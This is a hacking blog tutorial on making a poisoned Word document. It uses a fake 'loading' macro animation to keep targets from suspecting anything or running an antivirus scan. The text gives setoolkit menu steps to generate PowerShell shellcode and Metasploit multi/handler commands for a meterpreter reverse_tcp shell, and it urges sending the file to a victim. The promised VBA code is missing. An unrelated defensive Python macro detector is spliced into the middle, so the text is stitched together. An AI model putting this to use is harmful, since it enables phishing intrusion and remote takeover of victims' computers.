Hi guys, how is it going? I haven't posted for a while, sorry about that. I've prepared a lot of new tutorial topics, so there are a lot of new tutorials (focused on programming) coming up!
In the last series we crafted poisoned Word documents. The only thing we had to do was send one to the target, wait till he/she opened it and ... PWNED! The only problem is that it's quite hard to get the target to click the "enable macros" button. For that we need some social engineering. Social engineering is really hard, and not everyone is as good at it as famous social engineers like Kevin Mitnick.
Here are some other examples of malicious documents.
The only problem with these documents is that if the target clicks the enable button, nothing really happens: the text doesn't get decrypted or un-blurred. This might raise the target's suspicion, and they might run an AV scan against our document, which could be fatal for our whole attack. It would be much better if we could create a professional and convincing-looking sequence of actions that ensures our target clicks the enable-macros button without getting suspicious! In this tutorial we're going to write a VBA script that shows a loading screen from the moment the target presses the enable-macros button until our payload is loaded. Then the script removes the big red letters at the top that say "Please enable macros" or something like that. The last thing the script does is remove the "please enable macros" watermark. In this series I'll show you two differently styled versions of this script, one rotating and the other flipping, so we can do some pretty advanced stuff with this. Now, let's start!
The first step is to open up Word. At the top of our document I've typed: " PLEASE ENABLE MACROS TO SEE FULL the CONTENT! " You can type your own warning message here, but keep in mind that your code will then be a little different.
The second step is to create two 'shapes'. The first shape is the loading image, the image you want to flip. You can copy-paste one of these images if you want.
The second shape we're going to create is our "hider": a white shape placed over our "please wait" image. You can create it via Insert -> Shapes ->
Select a square or rectangle and place it over the "Please Wait" image.
Then set the shape's fill and borders to white, and our image is hidden.
The third step is to create a watermark. Go to Page Layout -> Watermark -> Custom Watermark. Now you'll see a menu like this:
Use the "Text Watermark" radio button and type your warning message in the text field. I've typed "Please enable Macros to see full content!" here as well. For Colour choose red and then press "OK".
Great, now we've created our layout, but it's still static. Let's put some 'magic' in it by creating our VBA script. To create the script hit Alt+F8; this opens a menu that gives you a few options. Type Workbook_Open in the text box at the top and then hit the Create button. Now you are in the Microsoft Visual Basic editor, or whatever they call it. This is the "IDE" we're going to use to design and execute our code.
The first part of the code is the declaration of variables for the two shapes.
The variables are:
If you placed the "Please wait" image first, set warner to 1 and hider to 2. If you did it the other way round, call warner 2 and hider 2. The second thing the code does is remove the 'hider' shape (the white shape placed over the "Please wait" image).
Do this with:
Then we're going to replace our "PLEASE ENABLE MACROS TO SEE FULL the CONTENT!" message (this could be different for you) that we typed at the top of our document with something like "Loading, please wait".
Do this with:
Great, the last thing we have to do before we start our "please wait" flipping animation is to remove our watermark.
Do this with:
Now we can start creating our animation. This part of the code is fairly complicated, but it relies on the stretching feature of shapes and a simple Do loop. The script repeats this a certain number of times in a row. The number of times you want the image to flip is defined in the variable "times", so change 15 to the number of times you want the image to flip.
Copy-paste this code:
Great, we've crafted a credible, cool-looking document. The last thing we have to do is add the payload. We're going to generate the payload with the setoolkit.
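Seen from the receiving side, the document built above is a macro-enabled OOXML package. As an added defensive check that is not part of this tutorial, the following Python script opens such a file as a zip and reports the two indicators a mail gateway or triage script can key on: a vbaProject.bin part and the macro-enabled main content type. The sample packages it inspects are constructed inside the script (placeholder bytes stand in for the VBA project).

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# OOXML content types that identify a macro-enabled Word package.
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
MACRO_MAIN_TYPE = "application/vnd.ms-word.document.macroEnabled.main+xml"
PLAIN_MAIN_TYPE = "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"
CT_NS = "http://schemas.openxmlformats.org/package/2006/content-types"


def inspect_office_package(data: bytes) -> dict:
    """Open an OOXML document as a zip and report whether it carries a VBA project."""
    result = {"is_ooxml": False, "vba_parts": [], "macro_enabled_main": False, "has_macros": False}
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return result  # not an OOXML package (legacy .doc, or not a document at all)
    with archive:
        names = set(archive.namelist())
        result["is_ooxml"] = "[Content_Types].xml" in names
        # Indicator 1: a vbaProject.bin part stored anywhere in the package.
        vba_parts = {n for n in names if n.lower().endswith("vbaproject.bin")}
        # Indicator 2: the content-types manifest declares a VBA project or a macro-enabled main part.
        if result["is_ooxml"]:
            root = ET.fromstring(archive.read("[Content_Types].xml"))
            for override in root.iter(f"{{{CT_NS}}}Override"):
                content_type = override.get("ContentType", "")
                if content_type == VBA_CONTENT_TYPE:
                    vba_parts.add(override.get("PartName", "").lstrip("/"))
                elif content_type == MACRO_MAIN_TYPE:
                    result["macro_enabled_main"] = True
    result["vba_parts"] = sorted(vba_parts)
    result["has_macros"] = bool(vba_parts) or result["macro_enabled_main"]
    return result


def build_sample(macro: bool) -> bytes:
    """Constructed minimal package: .docm-like when macro=True, .docx-like otherwise."""
    main_type = MACRO_MAIN_TYPE if macro else PLAIN_MAIN_TYPE
    overrides = f'<Override PartName="/word/document.xml" ContentType="{main_type}"/>'
    if macro:
        overrides += f'<Override PartName="/word/vbaProject.bin" ContentType="{VBA_CONTENT_TYPE}"/>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("[Content_Types].xml", f'<Types xmlns="{CT_NS}">{overrides}</Types>')
        archive.writestr("word/document.xml", "<document/>")
        if macro:
            archive.writestr("word/vbaProject.bin", b"\x00" * 16)  # placeholder, not a real VBA project
    return buf.getvalue()
```

Run inspect_office_package on the bytes of a received attachment; has_macros set on a file the sender had no reason to macro-enable is the triage signal. The vbaProject.bin indicator applies equally to .xlsm and .pptm packages, whose main content types differ.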
Note that this payload is a PowerShell payload, but you can add any payload you want here.
Go to your (Kali) Linux machine and just enter setoolkit to start the setoolkit. In the setoolkit select these options:
- 1 for "social engineering attacks"
- 9 for "powershell attack vectors"
- 1 for "powershell alphanumeric shellcode injector"
Then the setoolkit will ask you for an LHOST and an LPORT. Open up a new terminal window and use the command: ifconfig wlan0. Copy the inet addr (remember that this address is LAN only). Choose whatever LPORT you want; I use 4444. Shut down the setoolkit and display the shellcode. Do this with cat /root/.set/reports/powershell/x86_powershell_injection.txt. Tip: if you're using VMware Player and want to move that file to your Windows box, type nautilus /root/.set/reports/powershell/ and drag and drop the file to your Windows machine.
Once you have that file, copy the code and go back to the VBA IDE.
Now add this line and paste the payload between the brackets:
Amazing, now our script is complete. Go back to your (Kali) Linux machine and start Metasploit by typing msfconsole. Once it's loaded, type:
- use multi/handler
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST (your IP address)
- set LPORT 4444
- exploit
Now send the document to your target and see if he hits that "enable macros" button :)
That was it for today, guys. Bye.
@ClaimItToYou
PS: here is the whole script,